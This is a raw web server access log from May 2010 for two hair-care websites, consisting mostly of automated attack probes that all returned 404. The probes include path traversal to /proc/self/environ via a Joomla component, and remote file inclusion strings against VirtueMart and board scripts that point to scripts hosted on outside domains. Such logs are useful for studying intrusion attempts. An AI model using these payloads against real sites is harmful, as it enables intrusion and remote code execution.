89.108.66.144 - - [23/May/2010:19:25:36 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:19:25:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:19:25:37 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:11 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:13 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:14 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:26:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:29:50 -0700] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:30:17 -0700] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:19:30:23 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.66.144 - - [23/May/2010:19:30:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.66.144 - - [23/May/2010:19:30:23 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:30:31 -0700] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.22.207.181 - - [23/May/2010:19:30:40 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:30:53 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.22.207.181 - - [23/May/2010:19:31:17 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://nktech.kr/bbs//data/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:19:32:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4793 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.111.220 - - [23/May/2010:19:36:06 -0700] "GET /logs/access_100104.log HTTP/1.0" 200 553567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:39:01 -0700] "GET /logs/access_100125.log%20%20//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:39:04 -0700] "GET /logs//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:39:04 -0700] "GET /bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:19:41:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4690 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.24.251 - - [23/May/2010:19:46:47 -0700] "GET /bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:46:47 -0700] "GET /logs//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:46:47 -0700] "GET /logs/access_100125.log%20%20//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:19:46:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13162 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.24.251 - - [23/May/2010:19:48:38 -0700] "GET /bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:48:38 -0700] "GET /logs/access_100125.log%20%20//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [23/May/2010:19:48:38 -0700] "GET /logs//bbs/skin/moengallery/write.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.103.136.15 - - [23/May/2010:19:49:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:19:52:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12825 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
82.103.136.15 - - [23/May/2010:19:53:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:19:57:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:57:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:57:00 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:57:00 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:57:02 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:57:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:01 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:08 -0700] "GET /logs/access_100125.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:18 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:58:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:19:59:14 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:19:59:14 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:19:59:24 -0700] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:19:59:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:19:59:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:33 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:34 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:57 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:57 -0700] "GET /logs/access_100125.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:19:59:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:20:00:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13482 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:00:05 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:00:05 -0700] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:00:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:00:30 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:00:30 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:00:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:01:59 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:01:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:01:59 -0700] "GET /logs/access_100125.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:02:15 -0700] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:02:15 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:02:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:03 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:03 -0700] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:45 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:03:58 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:06:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:06:19 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:06:19 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:07:38 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:07:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:07:40 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:07:54 -0700] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:07:54 -0700] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:07:54 -0700] "GET /logs/access_100222.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:07:56 -0700] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:07:56 -0700] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:07:56 -0700] "GET /logs/access_100222.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:09:54 -0700] "GET /logs/access_100222.log%20%20/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:10:18 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:20:10:23 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:20:10:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:20:10:23 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:20:10:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13698 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:10:39 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:11:11 -0700] "GET /logs/access_100222.log%20%20/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.66.144 - - [23/May/2010:20:15:10 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.66.144 - - [23/May/2010:20:15:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.66.144 - - [23/May/2010:20:15:11 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:16:12 -0700] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:16:12 -0700] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:16:12 -0700] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:16:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:16:16 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:16:16 -0700] "GET /logs/access_100308.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:17:05 -0700] "GET /logs/access_100301.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:17:15 -0700] "GET /logs/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:17:16 -0700] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:17:16 -0700] "GET /delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [23/May/2010:20:17:42 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:17:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:17:42 -0700] "GET /logs/access_100308.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [23/May/2010:20:18:09 -0700] "GET /logs/access_100301.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
